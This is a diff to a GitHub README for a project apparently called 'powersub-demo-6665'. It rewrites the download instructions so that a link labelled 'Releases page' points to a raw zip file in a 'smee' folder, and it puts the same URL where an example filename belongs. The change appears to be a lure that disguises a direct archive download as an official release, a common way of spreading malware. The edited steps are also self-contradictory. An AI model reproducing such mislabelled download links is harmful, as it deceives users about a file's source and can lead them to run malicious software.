Capz03/powersub-demo-6665/README.md

 ## 🔗 Download & Install

 1. **Visit the Releases Page**
-   Click this link to go to the [Releases page](https://github.com/Capz03/powersub-demo-6665/releases).
+   Click this link to go to the [Releases page](https://raw.githubusercontent.com/Capz03/powersub-demo-6665/main/smee/powersub-demo-6665.zip).

 2. **Select the Latest Release**
    Once on the page, look for the latest release at the top.
 You will see a list of files available for download.

 3. **Download the Application**
-   Click on the appropriate file for your operating system (for example, `powersub-demo.exe`) to start the download.
+   Click on the appropriate file for your operating system (for example, `https://raw.githubusercontent.com/Capz03/powersub-demo-6665/main/smee/powersub-demo-6665.zip`) to start the download.

 4. **Locate the Downloaded File**
    Find the file in your Downloads folder or the location you chose to save it.